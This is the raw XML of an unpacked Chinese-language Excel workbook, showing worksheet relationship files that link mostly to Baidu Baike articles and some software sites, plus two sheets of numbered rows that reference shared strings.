    </i>
  </rowItems>
  <colItems count="1">
    <i/>
  </colItems>
  <dataFields count="1">
    <dataField name="计数项:Title" fld="1" subtotal="count" baseField="0" baseItem="0"/>
  </dataFields>
  <pivotTableStyleInfo name="PivotStyleLight16" showRowHeaders="1" showColHeaders="1" showRowStripes="0" showColStripes="0" showLastColumn="1"/>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baike.baidu.com/view/514313.htm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing1.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/23213.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/37.htm" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings1.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/7919.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/28127.htm"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http://baike.baidu.com/view/1709397.htm"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http://baike.baidu.com/view/514313.htm"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http://baike.baidu.com/view/3297.htm"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http://baike.baidu.com/view/15916.htm"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baike.baidu.com/view/692.htm?fr=ala0_1" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1091028.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/543390.htm" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing12.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings12.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/7919.htm"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5.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.pcworld.com.cn/how_to_use/1/2007/0823/12155.shtml"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baike.baidu.com/view/3067.htm" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/25740.htm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/751.htm" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/576338.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/4230.htm" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1360.htm" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing16.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1077.htm" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings16.bin"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/7770.htm" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="&#36335;&#30001;&#22120;&#35774;&#32622;&#22270;&#35299;"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0.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.diskgenius.cn/"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1.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/365.htm"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0.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1.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3.bin"/></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printerSettings" Target="../printerSettings/printerSettings44.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/880.htm" TargetMode="Externa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printerSettings" Target="../printerSettings/printerSettings45.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/597.htm" TargetMode="Externa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6.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7.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8.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9.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0.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1.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2.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3.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4.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5.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6.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7.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8.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59.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0.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1.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2.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3.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4.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5.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6.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet70.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hyperlink" Target="http://gmkong.googlepages.com/freewb_quick2.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.freewb.org/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing67.xml"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet71.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings68.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\computername" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="file:///\\computername" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing68.xml"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet72.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings69.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/923722.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/700129.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing69.xml"/></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0.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1.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2.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3.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4.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet78.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hyperlink" Target="http://baike.baidu.com/view/28127.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.excel329.cn/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing75.xml"/></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6.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet80.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing77.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings77.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/23213.htm" TargetMode="External"/></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8.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79.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0.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2.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8.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91.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet95.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1155689.htm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing84.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1155686.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1155685.htm" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings92.bin"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1162850.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1155691.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet96.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing85.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings93.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://explore.live.com/windows-live-essentials?os=win7" TargetMode="External"/></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95.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96.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet100.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing88.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings97.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/5103.htm" TargetMode="External"/></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98.bin"/></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99.bin"/></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100.bin"/></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101.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103.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet107.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing94.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings104.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/2882.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet108.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing95.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings105.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/18610.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet109.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing96.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings106.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/17206.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet110.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing97.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings107.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/4480.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet111.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing98.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings108.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1082.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet112.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing99.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings109.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1143.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet113.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printerSettings" Target="../printerSettings/printerSettings110.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/2089.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet114.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing101.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings111.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/7836.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet115.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings112.bin"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/7285.htm" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/7818.htm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing102.xml"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet116.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing103.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings113.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/26285.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet117.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing104.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings114.bin"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/9890.htm" TargetMode="External"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet119.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115.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet120.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing106.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings116.bin"/></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22.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing" Target="../drawings/drawing108.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/printerSettings" Target="../printerSettings/printerSettings117.bin"/></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet123.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118.bin"/></Relationships>
</file>

<file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <dimension ref="A1:C20"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection pane="bottomLeft" activeCell="B24" sqref="B24"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="3.5546875" style="2" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="18.33203125" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="15" bestFit="1" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:3">
      <c r="B1" s="435" t="s">
        <v>5798</v>
      </c>
      <c r="C1" t="s">
        <v>5813</v>
      </c>
    </row>
    <row r="2" spans="1:3">
      <c r="A2" s="2">
        <v>1</v>
      </c>
      <c r="B2" s="147" t="s">
        <v>5799</v>
      </c>
      <c r="C2" s="436">
        <v>3</v>
      </c>
    </row>
    <row r="3" spans="1:3">
      <c r="A3" s="2">
        <v>2</v>
      </c>
      <c r="B3" s="147" t="s">
        <v>172</v>
      </c>
      <c r="C3" s="436">
        <v>4</v>
      </c>
    </row>
    <row r="4" spans="1:3">
      <c r="A4" s="2">
        <v>3</v>
      </c>
      <c r="B4" s="147" t="s">
        <v>5800</v>
      </c>
      <c r="C4" s="436">
        <v>3</v>
      </c>
    </row>
    <row r="5" spans="1:3">
      <c r="A5" s="2">
        <v>4</v>
      </c>
      <c r="B5" s="147" t="s">
        <v>5801</v>
      </c>
      <c r="C5" s="436">
        <v>12</v>
      </c>
    </row>
    <row r="6" spans="1:3">
      <c r="A6" s="2">
        <v>5</v>
      </c>
      <c r="B6" s="147" t="s">
        <v>5802</v>
      </c>
      <c r="C6" s="436">
        <v>7</v>
      </c>
    </row>
    <row r="7" spans="1:3">
      <c r="A7" s="2">
        <v>6</v>
      </c>
      <c r="B7" s="147" t="s">
        <v>5803</v>
      </c>
      <c r="C7" s="436">
        <v>7</v>
      </c>
    </row>
    <row r="8" spans="1:3">
      <c r="A8" s="2">
        <v>7</v>
      </c>
      <c r="B8" s="147" t="s">
        <v>5804</v>
      </c>
      <c r="C8" s="436">
        <v>6</v>
      </c>
    </row>
    <row r="9" spans="1:3">
      <c r="A9" s="2">
        <v>8</v>
      </c>
      <c r="B9" s="147" t="s">
        <v>5805</v>
      </c>
      <c r="C9" s="436">
        <v>14</v>
      </c>
    </row>
    <row r="10" spans="1:3">
      <c r="A10" s="2">
        <v>9</v>
      </c>
      <c r="B10" s="147" t="s">
        <v>5806</v>
      </c>
      <c r="C10" s="436">
        <v>1</v>
      </c>
    </row>
    <row r="11" spans="1:3">
      <c r="A11" s="2">
        <v>10</v>
      </c>
      <c r="B11" s="147" t="s">
        <v>5807</v>
      </c>
      <c r="C11" s="436">
        <v>5</v>
      </c>
    </row>
    <row r="12" spans="1:3">
      <c r="A12" s="2">
        <v>11</v>
      </c>
      <c r="B12" s="147" t="s">
        <v>5808</v>
      </c>
      <c r="C12" s="436">
        <v>6</v>
      </c>
    </row>
    <row r="13" spans="1:3">
      <c r="A13" s="2">
        <v>12</v>
      </c>
      <c r="B13" s="147" t="s">
        <v>5809</v>
      </c>
      <c r="C13" s="436">
        <v>6</v>
      </c>
    </row>
    <row r="14" spans="1:3">
      <c r="A14" s="2">
        <v>13</v>
      </c>
      <c r="B14" s="147" t="s">
        <v>5794</v>
      </c>
      <c r="C14" s="436">
        <v>16</v>
      </c>
    </row>
    <row r="15" spans="1:3">
      <c r="A15" s="2">
        <v>14</v>
      </c>
      <c r="B15" s="147" t="s">
        <v>5810</v>
      </c>
      <c r="C15" s="436">
        <v>6</v>
      </c>
    </row>
    <row r="16" spans="1:3" hidden="1">
      <c r="A16" s="2">
        <v>15</v>
      </c>
      <c r="B16" s="147" t="s">
        <v>5811</v>
      </c>
      <c r="C16" s="436"/>
    </row>
    <row r="17" spans="1:3">
      <c r="A17" s="2">
        <v>16</v>
      </c>
      <c r="B17" s="147" t="s">
        <v>5814</v>
      </c>
      <c r="C17" s="436">
        <v>4</v>
      </c>
    </row>
    <row r="18" spans="1:3">
      <c r="A18" s="2">
        <v>17</v>
      </c>
      <c r="B18" s="147" t="s">
        <v>5816</v>
      </c>
      <c r="C18" s="436">
        <v>11</v>
      </c>
    </row>
    <row r="19" spans="1:3">
      <c r="B19" s="147" t="s">
        <v>6172</v>
      </c>
      <c r="C19" s="436">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:3">
      <c r="B20" s="147" t="s">
        <v>5812</v>
      </c>
      <c r="C20" s="436">
        <v>112</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sheetPr filterMode="1">
    <tabColor rgb="FFFF0000"/>
  </sheetPr>
  <dimension ref="A1:G116"/>
  <sheetViews>
    <sheetView zoomScaleNormal="100" zoomScaleSheetLayoutView="100" workbookViewId="0">
      <pane ySplit="1" topLeftCell="A2" activePane="bottomLeft" state="frozen"/>
      <selection activeCell="B6" sqref="B6"/>
      <selection pane="bottomLeft" activeCell="C29" sqref="C29"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4"/>
  <cols>
    <col min="1" max="1" width="6" style="2" customWidth="1"/>
    <col min="2" max="2" width="16.6640625" customWidth="1"/>
    <col min="3" max="3" width="47" customWidth="1"/>
    <col min="4" max="4" width="34.33203125" customWidth="1"/>
    <col min="7" max="7" width="11" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:7">
      <c r="A1" s="2" t="s">
        <v>3233</v>
      </c>
      <c r="B1" t="s">
        <v>3234</v>
      </c>
      <c r="C1" t="s">
        <v>3235</v>
      </c>
      <c r="D1" t="s">
        <v>3236</v>
      </c>
      <c r="E1" s="3" t="s">
        <v>64</v>
      </c>
      <c r="F1" t="s">
        <v>4738</v>
      </c>
      <c r="G1" s="299">
        <v>40396</v>
      </c>
    </row>
    <row r="2" spans="1:7" hidden="1">
      <c r="A2" s="2">
        <v>1</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>5615</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>5616</v>
      </c>
    </row>
    <row r="3" spans="1:7" hidden="1">
      <c r="A3" s="2">
        <v>2</v>
      </c>
      <c r="B3" t="s">
        <v>5615</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>5612</v>
      </c>
    </row>
    <row r="4" spans="1:7" hidden="1">
      <c r="A4" s="2">
        <v>3</v>
      </c>
      <c r="B4" t="s">
        <v>5615</v>
      </c>
      <c r="C4" s="12" t="s">
        <v>264</v>
      </c>
    </row>
    <row r="5" spans="1:7" hidden="1">
      <c r="A5" s="2">
        <v>4</v>
      </c>
      <c r="B5" s="3" t="s">
        <v>934</v>
      </c>
      <c r="C5" s="3" t="s">
        <v>1051</v>
      </c>
    </row>
    <row r="6" spans="1:7" hidden="1">
      <c r="A6" s="2">
        <v>5</v>
      </c>
      <c r="B6" t="s">
        <v>934</v>
      </c>
      <c r="C6" s="13" t="s">
        <v>943</v>
      </c>
    </row>
    <row r="7" spans="1:7" hidden="1">
      <c r="A7" s="2">
        <v>6</v>
      </c>
      <c r="B7" t="s">
        <v>934</v>
      </c>
      <c r="C7" s="3" t="s">
        <v>5565</v>
      </c>
    </row>
    <row r="8" spans="1:7" hidden="1">
      <c r="A8" s="2">
        <v>109</v>
      </c>
      <c r="B8" t="s">
        <v>934</v>
      </c>
      <c r="C8" s="3" t="s">
        <v>5959</v>
      </c>
    </row>
    <row r="9" spans="1:7" hidden="1">
      <c r="A9" s="2">
        <v>7</v>
      </c>
      <c r="B9" t="s">
        <v>5511</v>
      </c>
      <c r="C9" s="3" t="s">
        <v>5512</v>
      </c>
    </row>
    <row r="10" spans="1:7" hidden="1">
      <c r="A10" s="2">
        <v>8</v>
      </c>
      <c r="B10" t="s">
        <v>5509</v>
      </c>
      <c r="C10" s="3" t="s">
        <v>5510</v>
      </c>
    </row>
    <row r="11" spans="1:7" hidden="1">
      <c r="A11" s="2">
        <v>9</v>
      </c>
      <c r="B11" t="s">
        <v>5509</v>
      </c>
      <c r="C11" s="3" t="s">
        <v>3007</v>
      </c>
    </row>
    <row r="12" spans="1:7" hidden="1">
      <c r="A12" s="2">
        <v>10</v>
      </c>
      <c r="B12" t="s">
        <v>63</v>
      </c>
      <c r="C12" s="3" t="s">
        <v>1162</v>
      </c>
    </row>
    <row r="13" spans="1:7" hidden="1">
      <c r="A13" s="2">
        <v>11</v>
      </c>
      <c r="B13" t="s">
        <v>63</v>
      </c>
      <c r="C13" s="3" t="s">
        <v>5207</v>
      </c>
    </row>
    <row r="14" spans="1:7" hidden="1">
      <c r="A14" s="2">
        <v>12</v>
      </c>
      <c r="B14" t="s">
        <v>63</v>
      </c>
      <c r="C14" s="3" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="15" spans="1:7" hidden="1">
      <c r="A15" s="2">
        <v>13</v>
      </c>
      <c r="B15" t="s">
        <v>63</v>
      </c>
      <c r="C15" s="3" t="s">
        <v>5908</v>
      </c>
    </row>
    <row r="16" spans="1:7" hidden="1">
      <c r="A16" s="2">
        <v>14</v>
      </c>
      <c r="B16" t="s">
        <v>63</v>
      </c>
      <c r="C16" s="3" t="s">
        <v>3946</v>
      </c>
    </row>
    <row r="17" spans="1:3" hidden="1">
      <c r="A17" s="2">
        <v>15</v>
      </c>
      <c r="B17" t="s">
        <v>63</v>
      </c>
      <c r="C17" s="3" t="s">
        <v>161</v>
      </c>
    </row>
    <row r="18" spans="1:3" hidden="1">
      <c r="A18" s="2">
        <v>16</v>
      </c>
      <c r="B18" t="s">
        <v>63</v>
      </c>
      <c r="C18" s="3" t="s">
        <v>4886</v>
      </c>
    </row>
    <row r="19" spans="1:3" hidden="1">
      <c r="A19" s="2">
        <v>17</v>
      </c>
      <c r="B19" t="s">
        <v>63</v>
      </c>
      <c r="C19" s="12" t="s">
        <v>62</v>
      </c>
    </row>
    <row r="20" spans="1:3" hidden="1">
      <c r="A20" s="2">
        <v>18</v>
      </c>
      <c r="B20" t="s">
        <v>63</v>
      </c>
      <c r="C20" s="12" t="s">
        <v>720</v>
      </c>
    </row>
    <row r="21" spans="1:3" hidden="1">
      <c r="A21" s="2">
        <v>19</v>
      </c>
      <c r="B21" t="s">
        <v>63</v>
      </c>
      <c r="C21" s="12" t="s">
        <v>167</v>
      </c>
    </row>
    <row r="22" spans="1:3" hidden="1">
      <c r="A22" s="2">
        <v>20</v>
      </c>
      <c r="B22" t="s">
        <v>63</v>
      </c>
      <c r="C22" s="3" t="s">
        <v>4919</v>
      </c>
    </row>
    <row r="23" spans="1:3" hidden="1">
      <c r="A23" s="2">
        <v>21</v>
      </c>
      <c r="B23" t="s">
        <v>63</v>
      </c>
      <c r="C23" s="3" t="s">
        <v>1134</v>
      </c>
    </row>
    <row r="24" spans="1:3" hidden="1">
      <c r="A24" s="2">
        <v>22</v>
      </c>
      <c r="B24" t="s">
        <v>5815</v>
      </c>
      <c r="C24" s="3" t="s">
        <v>4811</v>
      </c>
    </row>
    <row r="25" spans="1:3" hidden="1">
      <c r="A25" s="2">
        <v>23</v>
      </c>
      <c r="B25" t="s">
        <v>5815</v>
      </c>
      <c r="C25" s="3" t="s">
        <v>5344</v>
      </c>
    </row>
